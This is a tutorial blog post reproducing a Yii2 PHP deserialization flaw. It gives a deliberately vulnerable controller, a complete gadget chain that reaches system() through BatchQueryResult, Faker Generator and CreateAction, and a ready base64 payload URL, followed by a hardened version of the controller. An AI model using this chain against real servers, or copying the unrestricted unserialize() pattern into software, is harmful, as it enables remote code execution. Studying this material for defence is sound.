
Reproducing the Yii2 Deserialization Vulnerability

Author: Internet


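Preface

Environment Setup

Set up the Yii2 environment with Docker

Reproducing the Vulnerability

Create an action that contains the vulnerability: /controllers/TestController.php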

<?php

namespace app\controllers;

use Yii;
use yii\web\Controller;

class TestController extends Controller
{
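	public function actionTest(){
		// Deliberately vulnerable: the request parameter is attacker-controlled
		$name = Yii::$app->request->get('unserialize');
		// ...and is passed to unserialize() with no class restrictions
		return unserialize(base64_decode($name));
	}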
}

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'system';
            $this->id = 'ls -al';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction, 'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>
/index.php?r=test/test&unserialize=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ
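
A hardened counterpart of the vulnerable action above, as an added example that is not code from the original post or from the Yii2 project. The class name SafeTestController and the helper containsObject are hypothetical, and PHP 7.0 or later is assumed for the options argument of unserialize().

```php
<?php
// Added example: hardened version of TestController::actionTest.
// SafeTestController and containsObject() are hypothetical names.
namespace app\controllers;

use Yii;
use yii\web\BadRequestHttpException;
use yii\web\Controller;

class SafeTestController extends Controller
{
    public function actionTest()
    {
        $raw = Yii::$app->request->get('unserialize');
        if (!is_string($raw) || $raw === '') {
            throw new BadRequestHttpException('Missing parameter.');
        }
        // Strict mode rejects characters outside the base64 alphabet.
        $bytes = base64_decode($raw, true);
        if ($bytes === false) {
            throw new BadRequestHttpException('Invalid base64.');
        }
        // allowed_classes => false (PHP >= 7.0): serialized objects become
        // __PHP_Incomplete_Class, so no application or vendor class is
        // instantiated and none of their __wakeup()/__destruct() methods run.
        $value = @unserialize($bytes, ['allowed_classes' => false]);
        if ($value === false && $bytes !== serialize(false)) {
            throw new BadRequestHttpException('Invalid serialized data.');
        }
        // Accept plain scalars and arrays only; refuse anything carrying an object.
        if (self::containsObject($value)) {
            throw new BadRequestHttpException('Objects are not accepted.');
        }
        return $this->asJson($value);
    }

    private static function containsObject($value)
    {
        // The instanceof check covers PHP < 7.2, where is_object() returns
        // false for __PHP_Incomplete_Class.
        if (is_object($value) || $value instanceof \__PHP_Incomplete_Class) {
            return true;
        }
        foreach (is_array($value) ? $value : [] as $item) {
            if (self::containsObject($item)) {
                return true;
            }
        }
        return false;
    }
}
```

Where the data format is under the application's control, exchanging JSON and parsing it with json_decode() removes the object-instantiation path entirely.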

References

Tags: serialization, schmunk42, Generator, unserialize, reproduction, Yii2, docker, yii2
Source: https://www.cnblogs.com/Konmu/p/14793335.html